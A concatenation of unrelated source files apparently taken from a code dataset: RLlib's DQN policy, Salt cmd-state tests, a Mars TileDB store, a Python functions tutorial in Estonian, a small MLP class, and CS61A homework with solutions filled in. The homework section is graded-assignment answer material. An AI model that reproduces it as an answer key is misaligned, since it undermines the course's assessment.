mindx= d2d < 1e-5*u.arcsec
return idx[mindx]
def _check_epoch(cat,epoch):
warn_about_epoch= False
if 'ref_epoch' in cat.dtype.fields:
if 'designation' not in cat.dtype.fields: # Assume this is DR1
if numpy.any(numpy.fabs(epoch-2015.) > 0.01):
warn_about_epoch= True
elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'):
if numpy.any(numpy.fabs(epoch-2015.5) > 0.01):
warn_about_epoch= True
if warn_about_epoch:
warnings.warn("You appear to be using a Gaia catalog, but are not setting the epoch to 2015. (DR1) or 2015.5 (DR2), which may lead to incorrect matches")
return None
| 2.265625 | 2 |
rllib/agents/dqn/dqn_torch_policy.py | ThomasLecat/ray | 0 | 1244 | <reponame>ThomasLecat/ray
from typing import Dict, List, Tuple
import gym
import ray
from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping
from ray.rllib.agents.dqn.dqn_tf_policy import (
PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio)
from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel
from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin
from ray.rllib.models.catalog import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.torch.torch_action_dist import (TorchCategorical,
TorchDistributionWrapper)
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.policy.torch_policy import LearningRateSchedule
from ray.rllib.policy.torch_policy_template import build_torch_policy
from ray.rllib.utils.error import UnsupportedSpaceException
from ray.rllib.utils.exploration.parameter_noise import ParameterNoise
from ray.rllib.utils.framework import try_import_torch
from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss,
reduce_mean_ignore_inf,
softmax_cross_entropy_with_logits)
from ray.rllib.utils.typing import TensorType, TrainerConfigDict
torch, nn = try_import_torch()
F = None
if nn:
F = nn.functional
class QLoss:
def __init__(self,
q_t_selected,
q_logits_t_selected,
q_tp1_best,
q_probs_tp1_best,
importance_weights,
rewards,
done_mask,
gamma=0.99,
n_step=1,
num_atoms=1,
v_min=-10.0,
v_max=10.0):
if num_atoms > 1:
# Distributional Q-learning which corresponds to an entropy loss
z = torch.range(0.0, num_atoms - 1, dtype=torch.float32)
z = v_min + z * (v_max - v_min) / float(num_atoms - 1)
# (batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms)
r_tau = torch.unsqueeze(
rewards, -1) + gamma**n_step * torch.unsqueeze(
1.0 - done_mask, -1) * torch.unsqueeze(z, 0)
r_tau = torch.clamp(r_tau, v_min, v_max)
b = (r_tau - v_min) / ((v_max - v_min) / float(num_atoms - 1))
lb = torch.floor(b)
ub = torch.ceil(b)
            # Indispensable check that is missing in most implementations:
            # when b happens to be an integer, lb == ub, so pr_j(s', a*) would
            # be discarded because (ub-b) == (b-lb) == 0.
floor_equal_ceil = (ub - lb < 0.5).float()
# (batch_size, num_atoms, num_atoms)
l_project = F.one_hot(lb.long(), num_atoms)
# (batch_size, num_atoms, num_atoms)
u_project = F.one_hot(ub.long(), num_atoms)
ml_delta = q_probs_tp1_best * (ub - b + floor_equal_ceil)
mu_delta = q_probs_tp1_best * (b - lb)
ml_delta = torch.sum(
l_project * torch.unsqueeze(ml_delta, -1), dim=1)
mu_delta = torch.sum(
u_project * torch.unsqueeze(mu_delta, -1), dim=1)
m = ml_delta + mu_delta
# Rainbow paper claims that using this cross entropy loss for
# priority is robust and insensitive to `prioritized_replay_alpha`
self.td_error = softmax_cross_entropy_with_logits(
logits=q_logits_t_selected, labels=m)
self.loss = torch.mean(self.td_error * importance_weights)
self.stats = {
# TODO: better Q stats for dist dqn
"mean_td_error": torch.mean(self.td_error),
}
else:
q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best
# compute RHS of bellman equation
q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked
# compute the error (potentially clipped)
self.td_error = q_t_selected - q_t_selected_target.detach()
self.loss = torch.mean(
importance_weights.float() * huber_loss(self.td_error))
self.stats = {
"mean_q": torch.mean(q_t_selected),
"min_q": torch.min(q_t_selected),
"max_q": torch.max(q_t_selected),
"mean_td_error": torch.mean(self.td_error),
}
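# Worked example of the categorical projection in QLoss above (illustrative,
# not part of the original source): with v_min=-10, v_max=10, num_atoms=3 the
# atoms are z = [-10, 0, 10]. A backed-up return r_tau = 4 gives
# b = (4 - (-10)) / 10 = 1.4, so lb = 1 and ub = 2, and a probability mass p on
# that sample is split as 0.6 * p onto atom z=0 and 0.4 * p onto atom z=10.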
class ComputeTDErrorMixin:
def __init__(self):
def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask,
importance_weights):
input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})
input_dict[SampleBatch.ACTIONS] = act_t
input_dict[SampleBatch.REWARDS] = rew_t
input_dict[SampleBatch.NEXT_OBS] = obs_tp1
input_dict[SampleBatch.DONES] = done_mask
input_dict[PRIO_WEIGHTS] = importance_weights
# Do forward pass on loss to update td error attribute
build_q_losses(self, self.model, None, input_dict)
return self.q_loss.td_error
self.compute_td_error = compute_td_error
def build_q_model_and_distribution(
policy: Policy, obs_space: gym.Space, action_space: gym.Space,
config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]:
if not isinstance(action_space, gym.spaces.Discrete):
raise UnsupportedSpaceException(
"Action space {} is not supported for DQN.".format(action_space))
if config["hiddens"]:
# try to infer the last layer size, otherwise fall back to 256
num_outputs = ([256] + config["model"]["fcnet_hiddens"])[-1]
config["model"]["no_final_linear"] = True
else:
num_outputs = action_space.n
# TODO(sven): Move option to add LayerNorm after each Dense
# generically into ModelCatalog.
add_layer_norm = (
isinstance(getattr(policy, "exploration", None), ParameterNoise)
or config["exploration_config"]["type"] == "ParameterNoise")
policy.q_model = ModelCatalog.get_model_v2(
obs_space=obs_space,
action_space=action_space,
num_outputs=num_outputs,
model_config=config["model"],
framework="torch",
model_interface=DQNTorchModel,
name=Q_SCOPE,
q_hiddens=config["hiddens"],
dueling=config["dueling"],
num_atoms=config["num_atoms"],
use_noisy=config["noisy"],
v_min=config["v_min"],
v_max=config["v_max"],
sigma0=config["sigma0"],
# TODO(sven): Move option to add LayerNorm after each Dense
# generically into ModelCatalog.
add_layer_norm=add_layer_norm)
policy.q_func_vars = policy.q_model.variables()
policy.target_q_model = ModelCatalog.get_model_v2(
obs_space=obs_space,
action_space=action_space,
num_outputs=num_outputs,
model_config=config["model"],
framework="torch",
model_interface=DQNTorchModel,
name=Q_TARGET_SCOPE,
q_hiddens=config["hiddens"],
dueling=config["dueling"],
num_atoms=config["num_atoms"],
use_noisy=config["noisy"],
v_min=config["v_min"],
v_max=config["v_max"],
sigma0=config["sigma0"],
# TODO(sven): Move option to add LayerNorm after each Dense
# generically into ModelCatalog.
add_layer_norm=add_layer_norm)
policy.target_q_func_vars = policy.target_q_model.variables()
return policy.q_model, TorchCategorical
def get_distribution_inputs_and_class(
policy: Policy,
model: ModelV2,
obs_batch: TensorType,
*,
explore: bool = True,
is_training: bool = False,
**kwargs) -> Tuple[TensorType, type, List[TensorType]]:
q_vals = compute_q_values(policy, model, obs_batch, explore, is_training)
q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals
policy.q_values = q_vals
return policy.q_values, TorchCategorical, [] # state-out
def build_q_losses(policy: Policy, model, _,
train_batch: SampleBatch) -> TensorType:
config = policy.config
# Q-network evaluation.
q_t, q_logits_t, q_probs_t = compute_q_values(
policy,
policy.q_model,
train_batch[SampleBatch.CUR_OBS],
explore=False,
is_training=True)
# Target Q-network evaluation.
q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values(
policy,
policy.target_q_model,
train_batch[SampleBatch.NEXT_OBS],
explore=False,
is_training=True)
# Q scores for actions which we know were selected in the given state.
one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS],
policy.action_space.n)
q_t_selected = torch.sum(
torch.where(q_t > FLOAT_MIN, q_t,
torch.tensor(0.0, device=policy.device)) *
one_hot_selection, 1)
q_logits_t_selected = torch.sum(
q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1)
# compute estimate of best possible value starting from state at t + 1
if config["double_q"]:
q_tp1_using_online_net, q_logits_tp1_using_online_net, \
q_dist_tp1_using_online_net = compute_q_values(
policy,
policy.q_model,
train_batch[SampleBatch.NEXT_OBS],
explore=False,
is_training=True)
q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1)
q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net,
policy.action_space.n)
q_tp1_best = torch.sum(
torch.where(q_tp1 > FLOAT_MIN, q_tp1,
torch.tensor(0.0, device=policy.device)) *
q_tp1_best_one_hot_selection, 1)
q_probs_tp1_best = torch.sum(
q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1)
else:
q_tp1_best_one_hot_selection = F.one_hot(
torch.argmax(q_tp1, 1), policy.action_space.n)
q_tp1_best = torch.sum(
torch.where(q_tp1 > FLOAT_MIN, q_tp1,
torch.tensor(0.0, device=policy.device)) *
q_tp1_best_one_hot_selection, 1)
q_probs_tp1_best = torch.sum(
q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1)
policy.q_loss = QLoss(
q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,
train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS],
train_batch[SampleBatch.DONES].float(), config["gamma"],
config["n_step"], config["num_atoms"], config["v_min"],
config["v_max"])
return policy.q_loss.loss
def adam_optimizer(policy: Policy,
config: TrainerConfigDict) -> "torch.optim.Optimizer":
return torch.optim.Adam(
policy.q_func_vars, lr=policy.cur_lr, eps=config["adam_epsilon"])
def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:
return dict({
"cur_lr": policy.cur_lr,
}, **policy.q_loss.stats)
def setup_early_mixins(policy: Policy, obs_space, action_space,
config: TrainerConfigDict) -> None:
LearningRateSchedule.__init__(policy, config["lr"], config["lr_schedule"])
def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space,
config: TrainerConfigDict) -> None:
ComputeTDErrorMixin.__init__(policy)
TargetNetworkMixin.__init__(policy, obs_space, action_space, config)
    # Move target net to device (this is done automatically for the
# policy.model, but not for any other models the policy has).
policy.target_q_model = policy.target_q_model.to(policy.device)
def compute_q_values(policy: Policy,
model: ModelV2,
obs: TensorType,
explore,
is_training: bool = False):
config = policy.config
model_out, state = model({
SampleBatch.CUR_OBS: obs,
"is_training": is_training,
}, [], None)
if config["num_atoms"] > 1:
(action_scores, z, support_logits_per_action, logits,
probs_or_logits) = model.get_q_value_distributions(model_out)
else:
(action_scores, logits,
probs_or_logits) = model.get_q_value_distributions(model_out)
if config["dueling"]:
state_score = model.get_state_value(model_out)
if policy.config["num_atoms"] > 1:
support_logits_per_action_mean = torch.mean(
support_logits_per_action, dim=1)
support_logits_per_action_centered = (
support_logits_per_action - torch.unsqueeze(
support_logits_per_action_mean, dim=1))
support_logits_per_action = torch.unsqueeze(
state_score, dim=1) + support_logits_per_action_centered
support_prob_per_action = nn.functional.softmax(
support_logits_per_action)
value = torch.sum(z * support_prob_per_action, dim=-1)
logits = support_logits_per_action
probs_or_logits = support_prob_per_action
else:
advantages_mean = reduce_mean_ignore_inf(action_scores, 1)
advantages_centered = action_scores - torch.unsqueeze(
advantages_mean, 1)
value = state_score + advantages_centered
else:
value = action_scores
return value, logits, probs_or_logits
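# Note on the dueling aggregation in compute_q_values (standard dueling-DQN
# identity, stated here for illustration): Q(s, a) = V(s) + A(s, a) - mean_a' A(s, a').
# E.g. with V(s) = 1.0 and advantages A = [2.0, 0.0, -2.0] (mean 0.0), the
# resulting Q-values are [3.0, 1.0, -1.0].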
def grad_process_and_td_error_fn(policy: Policy,
optimizer: "torch.optim.Optimizer",
loss: TensorType) -> Dict[str, TensorType]:
# Clip grads if configured.
return apply_grad_clipping(policy, optimizer, loss)
def extra_action_out_fn(policy: Policy, input_dict, state_batches, model,
action_dist) -> Dict[str, TensorType]:
return {"q_values": policy.q_values}
DQNTorchPolicy = build_torch_policy(
name="DQNTorchPolicy",
loss_fn=build_q_losses,
get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG,
make_model_and_action_dist=build_q_model_and_distribution,
action_distribution_fn=get_distribution_inputs_and_class,
stats_fn=build_q_stats,
postprocess_fn=postprocess_nstep_and_prio,
optimizer_fn=adam_optimizer,
extra_grad_process_fn=grad_process_and_td_error_fn,
extra_learn_fetches_fn=lambda policy: {"td_error": policy.q_loss.td_error},
extra_action_out_fn=extra_action_out_fn,
before_init=setup_early_mixins,
after_init=after_init,
mixins=[
TargetNetworkMixin,
ComputeTDErrorMixin,
LearningRateSchedule,
])
| 1.921875 | 2 |
formfyxer/__init__.py | SuffolkLITLab/FormFyxer | 1 | 1245 | from .lit_explorer import *
from .pdf_wrangling import *
| 1.007813 | 1 |
Overview/11 - funktsioonid.py | priidupaomets/python_kursus | 1 | 1246 | <reponame>priidupaomets/python_kursus<gh_stars>1-10
"""
funktsioonid.py
Funktsioonide ja protseduuride kasutamine
"""
#
# Protseduur
#
def minu_funktsioon():
print("See on protseduur")
# Kutsume funktsiooni välja
minu_funktsioon()
#
# Funktsioon
#
def liida(num1, num2):
return num1 + num2
sum = liida(3, 5)
print(sum)
# Näide vaikeväärtuste kasutamisest
# def funk(arg1 = väärtus1, arg2 = väärtus2)
# pass
def funk(arg1 = 0, arg2 = "Test"):
print(arg1, arg2)
funk() # Kutsume funktsiooni välja ilma argumente kaasa andmata
#
# Algarvude leidmine
#
def isprime(n):
    if n <= 1:
        return False
    for i in range(2, n):
        if n % i == 0:
            return False
    return True
# Call the function to test it
n = 5
if isprime(n):
    print(f"{n} IS a prime") # We use an f-string, which lets us put the variable directly inside the string
else:
    print(f"{n} is NOT a prime")
def list_primes(max_num = 100):
for n in range(2, max_num):
if isprime(n):
print(n, end = ' ', flush = True)
print()
list_primes()
#
# Functions with a variable number of arguments
#
# Simply add new arguments
def summa(num1, num2, num3):
    return num1 + num2 + num3
print(summa(1, 2, 3)) # Works
print(summa(1, 2)) # We get an error, because the new function requires 3 arguments
# Try function overloading (function overloading or method overloading)
def summa(num1, num2):
    return num1 + num2
def summa(num1, num2, num3):
    return num1 + num2 + num3
print(summa(1, 2)) # We get an error, because the last def overwrites the previous one
print(summa(1, 2, 3))
# Try functions with default values
def summa(num1, num2, num3 = 0, num4 = 0):
return num1 + num2 + num3 + num4
print(summa(1, 2))
print(summa(1, 2, 3))
print(summa(1, 2, 3, 4))
#print(summa(1, 2, 3, 4, 5)) # To make this work we have to change the function
def keskmine(num1, num2, num3 = 0, num4 = 0):
    sum = num1 + num2 + num3 + num4 # Same as summa(num1, num2, num3, num4)
    argumente = 4.0
    return sum / argumente
print(keskmine(1, 2)) # Obviously a wrong result (0.75 instead of 1.5)
print(keskmine(1, 2, 3)) # Also a wrong result (1.5 instead of 2)
print(keskmine(1, 2, 3, 4)) # Correct result
# Improve how the number of arguments is determined
def keskmine(num1, num2, num3 = 0, num4 = 0):
    sum = num1 + num2 + num3 + num4 # Same as summa(num1, num2, num3, num4)
    argumente = 2.0 # At least 2
    if num3 > 0:
        argumente = argumente + 1
    if num4 > 0:
        argumente = argumente + 1
    return sum / argumente
print(keskmine(1, 2)) # Correct result
print(keskmine(1, 2, 3)) # Correct result
print(keskmine(1, 2, 3, 4)) # Correct result
print(keskmine(1, 2, 3, 0)) # Wrong result!
print(keskmine(1, 0, 3, 2)) # Correct result!?! How is this correct - does the result depend on the order of the arguments?
# Use a different default value
def keskmine(num1, num2, num3 = None, num4 = None):
    sum = num1 + num2 # Cannot add all 4 args right away
    argumente = 2.0 # At least 2
    if num3 is not None:
        argumente += 1
        sum = sum + num3
    if num4 is not None:
        argumente += 1
        sum = sum + num4
    return sum / argumente
print(keskmine(1, 2)) # Correct result
print(keskmine(1, 2, 3)) # Correct result
print(keskmine(1, 2, 3, 4)) # Correct result
print(keskmine(1, 2, 3, 0)) # Correct result!
print(keskmine(1, 0, 3, 2)) # Correct result
# Try defining the arguments with a list
def summa(numbrid=[]):
    sum = 0
    for num in numbrid:
        sum += num
    return sum
#print(summa(1)) # Does not work, because it is not an iterable type
#print(summa(1, 2)) # Does not work, because it is not a list
arvud=[1, 2]
print(summa(arvud))
arvud=[1, 2, 3]
print(summa(arvud))
arvud=[1, 2, 3, 4]
print(summa(arvud))
print(summa([1, 2, 3, 4, 5])) # We can also pass it without an intermediate variable
arvud=[1]
print(summa(arvud))
def summa(*numbrid):
sum = 0
for num in numbrid:
sum += num
return sum
print(summa()) # Even this variant works
print(summa(1))
print(summa(1, 2))
arvud=[1, 2]
print(summa(*arvud)) # The '*' has to be used here as well
arvud=[1, 2, 3]
print(summa(*arvud))
arvud=[1, 2, 3, 4]
print(summa(*arvud))
arvud=[1, 2, 3, 4, 5]
print(summa(*arvud))
arvud=[1]
print(summa(*arvud))
# Different kinds of arguments
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True"):
print(arg1, arg2, *args, kw1, kw2)
argfun(1, 2, 3, 4, 5, kw1 = 10, kw2 = 12)
def argfun(**kwargs):
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(kw2 = 10, kw3 = 12, kw4 = 14)
def argfun(arg1, arg2, *args, **kwargs):
print(arg1, arg2, *args)
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True", **kwargs):
print(arg1, arg2, *args, kw1, kw2)
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
# How can we guarantee that the arguments are numbers?
def numsum(*numbrid):
sum = 0
for num in numbrid:
if isinstance(num, int) or isinstance(num, float):
sum += num
return sum
def numcount(*numbrid):
count = 0
for num in numbrid:
if isinstance(num, int) or isinstance(num, float):
count += 1
return count
def numavg(*numbrid):
sum = numsum(*numbrid)
count = numcount(*numbrid)
    return sum / (count * 1.0) # We can turn the divisor into a float
print(numsum(1))
print(numsum(1, 2))
print(numsum(1, 2, 3))
print(numsum(1, 2, 3, "4"))
print(numsum(1, None, 3, 4, 5))
print("-"*30)
print(numcount(1))
print(numcount(1, 2))
print(numcount(1, 2, 3))
print(numcount(1, 2, 3, "4"))
print(numcount(1, None, 3, 4, 5))
print("-"*30)
print(numavg(1))
print(numavg(1, 2))
print(numavg(1, 2, 3))
print(numavg(1, 2, 3, "4"))
print(numavg(1, None, 3, 4, 5))
print(numavg()) # Error! Division by zero!!!
# We will look at error handling more closely soon
| 3.25 | 3 |
tests/integration/states/test_cmd.py | l2ol33rt/salt | 0 | 1247 | # -*- coding: utf-8 -*-
'''
Tests for the file state
'''
# Import python libs
from __future__ import absolute_import
import errno
import os
import textwrap
import tempfile
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.paths import TMP_STATE_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import salt libs
import salt.utils
IS_WINDOWS = salt.utils.is_windows()
class CMDTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the cmd state
'''
def test_run_simple(self):
'''
cmd.run
'''
cmd = 'dir' if IS_WINDOWS else 'ls'
ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir())
self.assertSaltTrueReturn(ret)
def test_test_run_simple(self):
'''
cmd.run test interface
'''
ret = self.run_state('cmd.run', name='ls',
cwd=tempfile.gettempdir(), test=True)
self.assertSaltNoneReturn(ret)
class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the cmd state of run_redirect
'''
def setUp(self):
self.state_name = 'run_redirect'
state_filename = self.state_name + '.sls'
self.state_file = os.path.join(TMP_STATE_TREE, state_filename)
# Create the testfile and release the handle
fd, self.test_file = tempfile.mkstemp()
try:
os.close(fd)
except OSError as exc:
if exc.errno != errno.EBADF:
raise exc
# Create the testfile and release the handle
fd, self.test_tmp_path = tempfile.mkstemp()
try:
os.close(fd)
except OSError as exc:
if exc.errno != errno.EBADF:
raise exc
super(CMDRunRedirectTest, self).setUp()
def tearDown(self):
for path in (self.state_file, self.test_tmp_path, self.test_file):
try:
os.remove(path)
except OSError:
                # Not all of the tests leave files around that we want to remove,
                # as some of the tests create the sls files in the test itself
                # and some use files in the integration test file state tree.
pass
super(CMDRunRedirectTest, self).tearDown()
def test_run_unless(self):
'''
test cmd.run unless
'''
state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
{0}:
cmd.run:
- unless: echo cheese > {1}
'''.format(self.test_tmp_path, self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
def test_run_unless_multiple_cmds(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-35384')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless execution succeeded", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo "hello"_|-run']['comment'],
'Command "echo "hello"" run')
def test_run_creates_exists(self):
'''
test cmd.run creates already there
'''
state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
echo >> {0}:
cmd.run:
- creates: {0}
'''.format(self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
self.assertEqual(len(ret[state_key]['changes']), 0)
def test_run_creates_new(self):
'''
test cmd.run creates not there
'''
os.remove(self.test_file)
state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
echo >> {0}:
cmd.run:
- creates: {0}
'''.format(self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
self.assertEqual(len(ret[state_key]['changes']), 4)
def test_run_redirect(self):
'''
test cmd.run with shell redirect
'''
state_key = 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
echo test > {0}:
cmd.run
'''.format(self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the cmd state of run_watch
'''
def setUp(self):
self.state_name = 'run_watch'
state_filename = self.state_name + '.sls'
self.state_file = os.path.join(TMP_STATE_TREE, state_filename)
super(CMDRunWatchTest, self).setUp()
def tearDown(self):
os.remove(self.state_file)
super(CMDRunWatchTest, self).tearDown()
def test_run_watch(self):
'''
test cmd.run watch
'''
saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run'
biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait'
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
saltines:
cmd.run:
- name: echo changed=true
- cwd: /
- stateful: True
biscuits:
cmd.wait:
- name: echo biscuits
- cwd: /
- watch:
- cmd: saltines
'''))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[saltines_key]['result'])
self.assertTrue(ret[biscuits_key]['result'])
| 2.15625 | 2 |
mars/tensor/execution/datastore.py | ChenQuan/mars | 0 | 1248 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
try:
import tiledb
except ImportError: # pragma: no cover
tiledb = None
from ...lib.sparse import SparseNDArray
from ...lib.sparse.core import sps
from ..expressions import datastore
from .utils import get_tiledb_ctx
def _store_tiledb(ctx, chunk):
tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config)
uri = chunk.op.tiledb_uri
key = chunk.op.tiledb_key
timestamp = chunk.op.tiledb_timestamp
axis_offsets = chunk.op.axis_offsets
if not chunk.issparse():
# dense
to_store = np.ascontiguousarray(ctx[chunk.op.input.key])
slcs = []
for axis in range(chunk.ndim):
axis_offset = axis_offsets[axis]
axis_length = chunk.op.input.shape[axis]
slcs.append(slice(axis_offset, axis_offset + axis_length))
with tiledb.DenseArray(tiledb_ctx, uri, mode='w',
key=key, timestamp=timestamp) as arr:
arr[tuple(slcs)] = to_store
ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype)
else:
# sparse
to_store = ctx[chunk.op.input.key].spmatrix.tocoo()
if to_store.nnz > 0:
with tiledb.SparseArray(tiledb_ctx, uri, mode='w',
key=key, timestamp=timestamp) as arr:
if chunk.ndim == 1:
vec = to_store.col if to_store.shape[0] == 1 else to_store.row
vec += axis_offsets[0]
arr[vec] = to_store.data
else:
i, j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1]
arr[i, j] = to_store.data
ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype),
shape=chunk.shape)
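# Illustrative note (not from the original source): for a dense 2-D chunk of
# shape (100, 50) with axis_offsets (200, 0), the slices computed above write
# the chunk into the TileDB array region [200:300, 0:50]; for sparse chunks the
# COO row/col indices are shifted by the same offsets before writing.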
def register_data_store_handler():
from ...executor import register
register(datastore.TensorTileDBDataStore, _store_tiledb)
| 1.726563 | 2 |
fastgc/model/mlp.py | ppmlguy/fastgradclip | 2 | 1249 | <gh_stars>1-10
import torch
import torch.nn as nn
import torch.nn.functional as F
from fastgc.model.penet import PeGradNet
from fastgc.layers.linear import Linear
from fastgc.activation import activation
class MLP(PeGradNet):
def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid',
train_alg='batch'):
"""
Parameters:
------------------
- input_size: integer, the number of features in the input
- hidden_sizes: a list of integers, a list object containing number of units for hidden layers
- output_size: an integer, the length of output vector
- act_func: string, name of activation function to use for each hidden layer
- train_alg: string, allowed values are {'batch', 'reweight', 'naive'}
"""
super(MLP, self).__init__()
self.input_size = input_size
layer_sizes = [input_size] + hidden_sizes
self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True)
for in_size, out_size in zip(layer_sizes[:-1],
layer_sizes[1:])])
self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True)
self.act = activation[act_func]
self.train_alg=train_alg
# list of layers in the network
self.layers = [layer for layer in self.linears]
self.layers.append(self.output_layer)
def forward(self, x):
x = x.view(-1, self.input_size)
out = x
for layer in self.linears:
out = self.act(layer(out))
logits = self.output_layer(out)
return logits
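# Minimal usage sketch (illustrative; the sizes below are arbitrary assumptions):
#
#   import torch
#   net = MLP(input_size=784, hidden_sizes=[128, 64], output_size=10)
#   logits = net(torch.randn(32, 784))   # -> tensor of shape (32, 10)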
| 2.90625 | 3 |
05-Environments/hw02/hw02/hw02.py | ericchen12377/CS61A_LearningDoc | 2 | 1250 | """ Homework 2: Higher Order Functions"""
HW_SOURCE_FILE = 'hw02.py'
from operator import add, mul, sub
square = lambda x: x * x
identity = lambda x: x
triple = lambda x: 3 * x
increment = lambda x: x + 1
######################
# Required Questions #
######################
def product(n, f):
"""Return the product of the first n terms in a sequence.
n -- a positive integer
f -- a function that takes one argument to produce the term
>>> product(3, identity) # 1 * 2 * 3
6
>>> product(5, identity) # 1 * 2 * 3 * 4 * 5
120
>>> product(3, square) # 1^2 * 2^2 * 3^2
36
>>> product(5, square) # 1^2 * 2^2 * 3^2 * 4^2 * 5^2
14400
>>> product(3, increment) # (1+1) * (2+1) * (3+1)
24
>>> product(3, triple) # 1*3 * 2*3 * 3*3
162
"""
"*** YOUR CODE HERE ***"
result,k = 1,1
while k <= n:
result,k = f(k)*result, k + 1
return result
def accumulate(combiner, base, n, f):
"""Return the result of combining the first n terms in a sequence and base.
The terms to be combined are f(1), f(2), ..., f(n). combiner is a
two-argument commutative, associative function.
>>> accumulate(add, 0, 5, identity) # 0 + 1 + 2 + 3 + 4 + 5
15
>>> accumulate(add, 11, 5, identity) # 11 + 1 + 2 + 3 + 4 + 5
26
>>> accumulate(add, 11, 0, identity) # 11
11
>>> accumulate(add, 11, 3, square) # 11 + 1^2 + 2^2 + 3^2
25
>>> accumulate(mul, 2, 3, square) # 2 * 1^2 * 2^2 * 3^2
72
>>> accumulate(lambda x, y: x + y + 1, 2, 3, square)
19
>>> accumulate(lambda x, y: 2 * (x + y), 2, 3, square)
58
>>> accumulate(lambda x, y: (x + y) % 17, 19, 20, square)
16
"""
"*** YOUR CODE HERE ***"
result, k = base,1
while k <= n:
result, k = combiner(result,f(k)), k + 1
return result
def summation_using_accumulate(n, f):
"""Returns the sum of f(1) + ... + f(n). The implementation
uses accumulate.
>>> summation_using_accumulate(5, square)
55
>>> summation_using_accumulate(5, triple)
45
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'summation_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
